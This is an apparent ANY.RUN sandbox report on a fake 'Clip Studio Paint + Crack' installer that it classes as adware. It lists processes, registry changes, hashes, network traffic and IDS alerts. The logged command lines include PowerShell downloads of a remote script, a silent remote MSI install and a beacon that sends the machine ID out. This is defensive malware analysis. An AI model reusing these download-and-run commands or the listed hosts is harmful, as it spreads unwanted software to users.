File name:

Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe

Full analysis: https://app.any.run/tasks/1300fab6-1c70-4685-a08d-a622aa367942
Verdict: Malicious activity
Threats:

Adware is a form of malware that targets users with unwanted advertisements, often disrupting their browsing experience. It typically infiltrates systems through software bundling, malicious websites, or deceptive downloads. Once installed, it may track user activity, collect sensitive data, and display intrusive ads, including pop-ups or banners. Some advanced adware variants can bypass security measures and establish persistence on devices, making removal challenging. Additionally, adware can create vulnerabilities that other malware can exploit, posing a significant risk to user privacy and system security.

Malware Trends Tracker     >>>
Analysis date: May 25, 2024, 09:56:10
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
adware
innosetup
qrcode
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5:

6FF10888FBD099D32E89AF813C280ED9

SHA1:

D0E8BF6F9B47FD83035320E180F973C41CF80805

SHA256:

C1C8002835E21250E8154F8ED3987241D40405B766023E392BF6540B078859FA

SSDEEP:

196608:qGTFNY3XaYjIMxtyz9aQDeAHsaiTkXnurxXb:qGhNYjjIy6ajunML

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Drops the executable file immediately after the start

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
      • set_2.exe (PID: 1596)
      • msiexec.exe (PID: 936)

  • SUSPICIOUS

    • Malware-specific behavior (creating "System.dll" in Temp)

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)

    • The process creates files with name similar to system file names

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)

    • Reads security settings of Internet Explorer

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
      • set_2.tmp (PID: 736)
      • msiexec.exe (PID: 936)

    • Executable content was dropped or overwritten

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
      • set_2.exe (PID: 1596)

    • Reads the Internet Settings

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
      • powershell.exe (PID: 2464)
      • powershell.exe (PID: 568)
      • set_2.tmp (PID: 736)

    • Reads settings of System Certificates

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)

    • Checks Windows Trust Settings

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
      • msiexec.exe (PID: 936)

    • Creates file in the systems drive root

      • mot.exe (PID: 1580)
      • ntvdm.exe (PID: 768)

    • Unusual connection from system programs

      • powershell.exe (PID: 2464)
      • powershell.exe (PID: 568)

    • The Powershell connects to the Internet

      • powershell.exe (PID: 2464)
      • powershell.exe (PID: 568)

    • Reads the Windows owner or organization settings

      • set_2.tmp (PID: 736)
      • msiexec.exe (PID: 936)

    • The process executes Powershell scripts

      • set_2.tmp (PID: 736)

    • Starts POWERSHELL.EXE for commands execution

      • set_2.tmp (PID: 736)

    • Request a resource from the Internet using PowerShell's cmdlet

      • set_2.tmp (PID: 736)

    • Downloads file from URI

      • powershell.exe (PID: 568)

    • Adds/modifies Windows certificates

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • msiexec.exe (PID: 936)

  • INFO

    • Checks supported languages

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • set_2.exe (PID: 1596)
      • set_2.tmp (PID: 736)
      • wmpnscfg.exe (PID: 2316)
      • mot.exe (PID: 1580)
      • msiexec.exe (PID: 936)
      • msiexec.exe (PID: 1480)

    • Reads the computer name

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
      • set_2.tmp (PID: 736)
      • wmpnscfg.exe (PID: 2316)
      • msiexec.exe (PID: 936)
      • msiexec.exe (PID: 1480)

    • Checks proxy server information

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)

    • Reads the machine GUID from the registry

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
      • set_2.tmp (PID: 736)
      • msiexec.exe (PID: 936)
      • msiexec.exe (PID: 1480)

    • Creates files or folders in the user directory

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)

    • Create files in a temporary directory

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
      • set_2.exe (PID: 1596)
      • set_2.tmp (PID: 736)
      • msiexec.exe (PID: 936)

    • Reads the software policy settings

      • Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe (PID: 4084)
      • mot.exe (PID: 1580)
      • msiexec.exe (PID: 936)

    • Manual execution by a user

      • wmpnscfg.exe (PID: 2316)

    • Disables trace logs

      • powershell.exe (PID: 568)
      • powershell.exe (PID: 2464)

    • Application launched itself

      • msiexec.exe (PID: 936)

    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 936)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 2464)

    • Reads Internet Explorer settings

      • powershell.exe (PID: 2464)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (67.4)
.dll | Win32 Dynamic Link Library (generic) (14.2)
.exe | Win32 Executable (generic) (9.7)
.exe | Generic Win/DOS Executable (4.3)
.exe | DOS Executable Generic (4.3)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2023:07:02 02:09:43+00:00
ImageFileCharacteristics: No relocs, Executable, No line numbers, No symbols, 32-bit
PEType: PE32
LinkerVersion: 6
CodeSize: 26624
InitializedDataSize: 139776
UninitializedDataSize: 2048
EntryPoint: 0x3645
OSVersion: 4
ImageVersion: 6
SubsystemVersion: 4
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
55
Monitored processes
12
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start clip studio paint 5.9.10 + materials - p2p + crack.exe wmpnscfg.exe no specs mot.exe ntvdm.exe set_2.exe set_2.tmp no specs powershell.exe powershell.exe msiexec.exe no specs msiexec.exe msiexec.exe no specs clip studio paint 5.9.10 + materials - p2p + crack.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
568"powershell.exe" -command "Invoke-WebRequest -Uri https://test-js-agent.s3.amazonaws.com/event.ps1 -OutFile C:\Users\admin\AppData\Local\Temp\is-LN13S.tmp\event.ps1"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
set_2.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
736"C:\Users\admin\AppData\Local\Temp\is-OB6LE.tmp\set_2.tmp" /SL5="$401CE,972372,832512,C:\Users\admin\AppData\Local\Temp\nstE5A1.tmp\set_2.exe" /VERYSILENT /SUPPRESSMSGBOXES /CLICKID=2632 /SOURCEID=2632C:\Users\admin\AppData\Local\Temp\is-OB6LE.tmp\set_2.tmpset_2.exe
User:
admin
Company:
Digital Pulse LLC
Integrity Level:
HIGH
Description:
Setup/Uninstall
Version:
51.1052.0.0
Modules
Images
c:\users\admin\appdata\local\temp\is-ob6le.tmp\set_2.tmp
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\mpr.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
768"C:\Windows\system32\ntvdm.exe" -i1 C:\Windows\System32\ntvdm.exe
mot.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
NTVDM.EXE
Exit code:
3221225477
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\ntvdm.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
936C:\Windows\system32\msiexec.exe /VC:\Windows\System32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
956"C:\Windows\System32\msiexec.exe" /I https://nodejs.org/dist/v13.14.0/node-v13.14.0-x86.msi /qn /norestartC:\Windows\System32\msiexec.exeset_2.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1480C:\Windows\system32\MsiExec.exe -Embedding D91B3163514D07760FC0AD81DD4912F3C:\Windows\System32\msiexec.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
1580"C:\Users\admin\AppData\Local\Temp\nse5BC0.tmp\mot.exe"C:\Users\admin\AppData\Local\Temp\nse5BC0.tmp\mot.exe
Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe
User:
admin
Integrity Level:
HIGH
Modules
Images
c:\users\admin\appdata\local\temp\nse5bc0.tmp\mot.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
1596"C:\Users\admin\AppData\Local\Temp\nstE5A1.tmp\set_2.exe" /VERYSILENT /SUPPRESSMSGBOXES /CLICKID=2632 /SOURCEID=2632C:\Users\admin\AppData\Local\Temp\nstE5A1.tmp\set_2.exe
mot.exe
User:
admin
Company:
Digital Pulse LLC
Integrity Level:
HIGH
Description:
DPulse Setup
Version:
Modules
Images
c:\users\admin\appdata\local\temp\nste5a1.tmp\set_2.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.24483_none_2b200f664577e14b\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2316"C:\Program Files\Windows Media Player\wmpnscfg.exe"C:\Program Files\Windows Media Player\wmpnscfg.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Media Player Network Sharing Service Configuration Application
Exit code:
0
Version:
12.0.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\program files\windows media player\wmpnscfg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
2464"powershell.exe" -Command "Invoke-WebRequest -Uri 'https://resolverapp.com/p?machine_id=90059c37-1320-41a4-b58d-2b75a9850d2f&publisher_id=2964&event=install&component=agent&click_id='"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
set_2.tmp
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
47 173
Read events
42 320
Write events
4 824
Delete events
29

Modification events

(PID) Process:(4084) Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:writeName:ProxyEnable
Value:
0
(PID) Process:(4084) Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:delete valueName:ProxyServer
Value:
(PID) Process:(4084) Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:delete valueName:ProxyOverride
Value:
(PID) Process:(4084) Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:delete valueName:AutoConfigURL
Value:
(PID) Process:(4084) Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
Operation:delete valueName:AutoDetect
Value:
(PID) Process:(4084) Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
Operation:writeName:SavedLegacySettings
Value:
460000005D010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A8016B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
(PID) Process:(4084) Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(4084) Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(4084) Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(4084) Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
27
Suspicious files
1 089
Text files
2 180
Unknown types
5

Dropped files

PID
Process
Filename
Type
4084Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506compressed
MD5:29F65BA8E88C063813CC50A4EA544E93
SHA256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
4084Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeC:\Users\admin\AppData\Local\Temp\nse5BC0.tmp\rtytext
MD5:B1B15DF059C50EE5B915A3472BE584D3
SHA256:8B3E8E21C882A7FA59033ABF5A356D8202BB61200411BFE32F64151FC625EFA1
4084Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157binary
MD5:199EB7BDAFBAEA2C5305B1927C6D69C7
SHA256:DCE86435CC3613D817BA55BBAE4AE9BFBE4ECA8230374A60A38D592FA5036247
4084Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\arpk[1].htmtext
MD5:B1B15DF059C50EE5B915A3472BE584D3
SHA256:8B3E8E21C882A7FA59033ABF5A356D8202BB61200411BFE32F64151FC625EFA1
4084Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506binary
MD5:80E5AB18ECAFD7E3AE595672A2BD0627
SHA256:F58A30A4077E85F30F0A0E44E49135DA4CAABF6A03CFB79B0989E26958A44B57
4084Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeC:\Users\admin\AppData\Local\Temp\nse5BC0.tmp\INetC.dllexecutable
MD5:40D7ECA32B2F4D29DB98715DD45BFAC5
SHA256:85E03805F90F72257DD41BFDAA186237218BBB0EC410AD3B6576A88EA11DCCB9
4084Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeC:\Users\admin\AppData\Local\Temp\Tar89A8.tmpcat
MD5:435A9AC180383F9FA094131B173A2F7B
SHA256:67DC37ED50B8E63272B49A254A6039EE225974F1D767BB83EB1FD80E759A7C34
4084Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1B1495DD322A24490E2BF2FAABAE1C61binary
MD5:5AE8478AF8DD6EEC7AD4EDF162DD3DF1
SHA256:FE42AC92EAE3B2850370B73C3691CCF394C23AB6133DE39F1697A6EBAC4BEDCA
4084Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exeC:\Users\admin\AppData\Local\Temp\Cab89A7.tmpcompressed
MD5:29F65BA8E88C063813CC50A4EA544E93
SHA256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
1580mot.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\star[1].phptext
MD5:444BCB3A3FCF8389296C49467F27E1D6
SHA256:2689367B205C16CE32ED4200942B8B8B1E262DFC70D9BC9FBC77C49699A4F1DF
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
13
TCP/UDP connections
17
DNS requests
15
Threats
9

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4084
Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe
GET
304
23.219.78.213:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?173dfc45889b84bc
unknown
unknown
4084
Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe
GET
200
172.67.145.207:80
http://dollshands.icu/arpk.php?pe=n&p=3915&t=49615566&title=Q2xpcCBTdHVkaW8gUGFpbnQgNS45LjEwICsgTWF0ZXJpYWxzIC0gUDJQICsgQ3JhY2s=&sub=
unknown
unknown
4084
Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe
GET
200
23.219.78.213:80
http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?0fd705b4979870b9
unknown
unknown
4084
Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe
GET
200
23.218.185.6:80
http://x2.c.lencr.org/
unknown
unknown
4084
Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe
GET
200
23.218.185.6:80
http://x1.c.lencr.org/
unknown
unknown
1580
mot.exe
GET
200
188.114.97.3:80
http://waychurch.xyz/lod.php?fz=&d=nsis&msg=&r=offer_exists&ko=no&o=1662&a=2632&dn=420&spot=1&t=1716631000
unknown
unknown
1580
mot.exe
GET
200
23.106.59.52:80
http://www.primeredking.click/ping/?count=true&id=55ghm2fide1
unknown
unknown
1580
mot.exe
GET
302
188.114.97.3:80
http://waychurch.xyz/dol.php?paw=433835&spot=2&a=2632&on=310&o=365
unknown
unknown
1580
mot.exe
GET
302
188.114.97.3:80
http://waychurch.xyz/dol.php?paw=964334&spot=3&a=2632&on=416&o=1658
unknown
unknown
1580
mot.exe
GET
200
108.138.2.10:80
http://o.ss2.us//MEowSDBGMEQwQjAJBgUrDgMCGgUABBSLwZ6EW5gdYc9UaSEaaLjjETNtkAQUv1%2B30c7dH4b0W1Ws3NcQwg6piOcCCQCnDkpMNIK3fw%3D%3D
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:138
whitelisted
4084
Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe
172.67.145.207:80
dollshands.icu
CLOUDFLARENET
US
unknown
4084
Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe
104.21.25.118:443
downtownblade.xyz
CLOUDFLARENET
unknown
4084
Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe
23.219.78.213:80
ctldl.windowsupdate.com
CLARO S.A.
BR
unknown
4
System
192.168.100.255:137
whitelisted
4084
Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe
23.218.185.6:80
x1.c.lencr.org
AKAMAI-AS
US
unknown
1580
mot.exe
188.114.97.3:443
waychurch.xyz
CLOUDFLARENET
NL
unknown
1580
mot.exe
188.114.97.3:80
waychurch.xyz
CLOUDFLARENET
NL
unknown
1580
mot.exe
23.106.59.52:80
www.primeredking.click
Leaseweb Uk Limited
GB
unknown
1580
mot.exe
18.66.121.63:443
dyjqpkh7b3pfj.cloudfront.net
AMAZON-02
US
unknown

DNS requests

Domain
IP
Reputation
dollshands.icu
  • 172.67.145.207
  • 104.21.39.132
unknown
downtownblade.xyz
  • 104.21.25.118
  • 172.67.134.52
unknown
ctldl.windowsupdate.com
  • 23.219.78.213
  • 23.219.78.199
whitelisted
x1.c.lencr.org
  • 23.218.185.6
whitelisted
x2.c.lencr.org
  • 23.218.185.6
whitelisted
waychurch.xyz
  • 188.114.97.3
  • 188.114.96.3
unknown
www.primeredking.click
  • 23.106.59.52
unknown
dyjqpkh7b3pfj.cloudfront.net
  • 18.66.121.63
  • 18.66.121.142
  • 18.66.121.44
  • 18.66.121.52
unknown
o.ss2.us
  • 108.138.2.10
  • 108.138.2.173
  • 108.138.2.107
  • 108.138.2.195
whitelisted
ocsp.rootg2.amazontrust.com
  • 18.245.39.64
whitelisted

Threats

PID
Process
Class
Message
1088
svchost.exe
Potentially Bad Traffic
ET INFO DNS Query for Suspicious .icu Domain
Potentially Bad Traffic
ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))
Potentially Bad Traffic
ET HUNTING Observed Let's Encrypt Certificate for Suspicious TLD (.xyz)
1580
mot.exe
Potentially Bad Traffic
ET HUNTING Observed Let's Encrypt Certificate for Suspicious TLD (.xyz)
1580
mot.exe
Potentially Bad Traffic
ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))
Potentially Bad Traffic
ET USER_AGENTS Observed Suspicious UA (NSIS_Inetc (Mozilla))
3 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
Clip Studio Paint 5.9.10 + Materials - P2P + Crack.exe